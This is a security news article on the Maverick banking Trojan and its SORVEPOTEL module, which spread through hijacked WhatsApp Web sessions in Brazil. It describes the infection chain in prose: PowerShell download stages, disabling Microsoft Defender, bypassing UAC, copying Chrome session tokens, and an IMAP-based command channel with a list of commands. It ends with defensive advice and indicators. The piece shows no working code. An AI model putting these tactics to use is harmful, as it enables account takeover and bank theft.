WhatsApp Under the Control of Bank Hackers — The Maverick Virus Steals Browser Sessions, Infects All Your Friends, and Drains Bank Accounts
148 million people are threatened by a self-propagating Trojan. Who is next?
Researchers have uncovered a link between the known Coyote banking Trojan and the recently discovered Maverick malware, which spreads via WhatsApp. Analysts note similarities in the .NET platform used, functionality, and infection mechanisms—all pointing to a common origin and affiliation with a single cybercriminal ecosystem operating in Brazil.
Maverick was first reported by Trend Micro, whose researchers linked it to the Water Saci group. The campaign is built from two components. The first is a self-propagating module, SORVEPOTEL, distributed via the web version of WhatsApp; the second is a ZIP archive containing the main Maverick executable, which deploys the malicious payload on the victim's device. Later, Sophos and Kaspersky Lab conducted independent analyses: Sophos suggested that Maverick is an evolution of Coyote, while Kaspersky confirmed the presence of matching code segments but classified it as a separate family focused on mass attacks against Brazilian users.
A CyberProof report reveals new technical details of the infection chain. The ZIP file contains a Windows shortcut (LNK). When launched, it calls cmd.exe or PowerShell to download the first stage from a remote server—the publication mentions the domain "zapgrande[.]com". Next, the PowerShell script deploys intermediate tools, disables Microsoft Defender, and bypasses User Account Control (UAC), before downloading a .NET loader. This loader checks for analysis tools and terminates if debuggers are detected, then downloads the main components—SORVEPOTEL and Maverick.
A notable feature is the geographical filtering mechanism: Maverick installation only proceeds after confirming the infected system is in Brazil. The malware checks the time zone, system language, regional settings, and date format for this purpose. CyberProof also recorded instances where the same infrastructure was used to attack hotels—likely an expansion of the campaign's target audience.
As part of Water Saci's updated tactics, detailed by Trend Micro, the hackers moved away from .NET binaries in favor of a combination of VBScript and PowerShell. This setup allows them to hijack WhatsApp Web sessions and send infected ZIP archives to the victim's contact list. To automate the browser, the attackers download ChromeDriver and use Selenium, enabling them to simulate user actions, manage profiles, and send messages.
The typical compromise scheme begins with unpacking a ZIP archive containing an obfuscated VBS loader named "Orcamento.vbs" (aka SORVEPOTEL). This VBScript executes a PowerShell command that downloads and runs the "tadeu.ps1" script directly in memory. The script then modifies the Chrome browser profile: it terminates active processes and copies cookies, authorization tokens, and saved sessions from the user's directory to a temporary storage location. This gives the malware access to WhatsApp Web without needing to re-scan the QR code.
Control over the session allows the script to send the infected archive to all contacts while simultaneously receiving message templates from the command-and-control (C2) server. For disguise, a fake window with the text "WhatsApp Automation v6.0" is displayed, creating the illusion of a legitimate process. During the mass mailing, PowerShell iterates through each contact, inserting the recipient's name and a time-appropriate greeting into the template; it checks for a "pause" signal from the C2 server before sending to dynamically manage activity.
The communication channel in SORVEPOTEL is implemented unusually: instead of standard HTTP, it uses the IMAP protocol. The backdoor connects to a mailbox at terra.com[.]br with hardcoded credentials and reads commands from incoming emails. Some accounts are protected by multi-factor authentication (MFA), forcing the operators to manually enter one-time codes to log in. This slows down operations but provides stealth. After receiving a new C2 server URL, the malware regularly polls it and executes the received instructions.
The list of supported commands covers the full range of post-exploitation functions:
- Gathering system information (INFO)
- Executing commands via cmd.exe (CMD) or PowerShell (POWERSHELL)
- Taking screenshots (SCREENSHOT)
- Viewing the process list (TASKLIST)
- Terminating specified tasks (KILL)
- Working with files and directories (LIST_FILES, DOWNLOAD_FILE, UPLOAD_FILE, DELETE, RENAME, COPY, MOVE, FILE_INFO, SEARCH, CREATE_FOLDER)
- Additional functions for reboot (REBOOT), shutdown (SHUTDOWN), self-update (UPDATE), and checking the mailbox for new C2 addresses (CHECK_EMAIL)
The threat's significance for Brazil is obvious: WhatsApp remains one of the main communication platforms in the country, with over 148 million active users. Mass mailing archives via contact lists makes the campaign highly contagious and cheap to implement, especially given the use of stolen browser profiles to bypass authentication.
It is advised to strengthen control over browser and system script behavior:
- Monitor for unauthorized copying of browser profiles.
- Block suspicious PowerShell and VBScript calls.
- Restrict the execution of third-party scripts using AppLocker or WDAC.
- Keep antivirus databases up to date.
- Monitor activity related to terra.com[.]br mailboxes and network connections to external domains like "zapgrande[.]com".
The comparison of Coyote and Maverick demonstrates the evolution of banking Trojan distribution methods: attackers are moving from conventional loaders to using legitimate browser profiles and messengers, increasing the stealth and effectiveness of attacks. This shift requires defense specialists to adapt their monitoring tools and analysis automation, as well as foster close cooperation between infrastructure operators and vendors.
